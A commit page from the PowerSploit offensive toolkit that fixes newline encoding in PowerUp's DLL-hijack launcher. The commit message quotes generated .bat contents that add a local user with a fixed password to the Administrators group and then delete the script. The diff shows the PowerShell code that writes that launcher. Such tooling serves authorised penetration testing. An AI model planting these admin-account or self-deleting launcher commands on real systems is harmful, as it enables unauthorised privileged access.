diff options
| author | Jon Cave <jon.cave@mwrinfosecurity.com> | 2016-06-30 10:12:27 +0200 |
|---|---|---|
| committer | Jon Cave <jon.cave@mwrinfosecurity.com> | 2016-06-30 10:12:27 +0200 |
| commit | 9596f682744cf5c8bdcb67b6f2a18f5be94073e9 (patch) | |
| tree | 95092d4223a0b82e813d21d4a8c4983ae7c87d77 | |
| parent | 81ac124f2211799207711fcd1b5fadb0091510f6 (diff) | |
| download | PowerSploit-9596f682744cf5c8bdcb67b6f2a18f5be94073e9.tar.gz PowerSploit-9596f682744cf5c8bdcb67b6f2a18f5be94073e9.zip | |
PowerUp: Remove badly encoded new lines from .bat output
The current implementation results in a .bat like:
@echo off\n
start /b net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add\n
start /b "" cmd /c del "%~f0"&exit /b
With literal "\n" strings at the end of the first two lines.
A new line in a PowerShell string should be "`n". However, an extra new
line isn't actually necessary in this case.
| -rw-r--r-- | Privesc/PowerUp.ps1 | 4 |
1 files changed, 2 insertions, 2 deletions
diff --git a/Privesc/PowerUp.ps1 b/Privesc/PowerUp.ps1 index 0b62245..2466975 100644 --- a/Privesc/PowerUp.ps1 +++ b/Privesc/PowerUp.ps1 @@ -2669,8 +2669,8 @@ function Write-HijackDll { # build the launcher .bat if (Test-Path $TargetBatPath) { Remove-Item -Force $TargetBatPath } - "@echo off\n" | Out-File -Encoding ASCII -Append $TargetBatPath - "start /b $BatCommand\n" | Out-File -Encoding ASCII -Append $TargetBatPath + "@echo off" | Out-File -Encoding ASCII -Append $TargetBatPath + "start /b $BatCommand" | Out-File -Encoding ASCII -Append $TargetBatPath 'start /b "" cmd /c del "%~f0"&exit /b' | Out-File -Encoding ASCII -Append $TargetBatPath Write-Verbose ".bat launcher written to: $TargetBatPath" |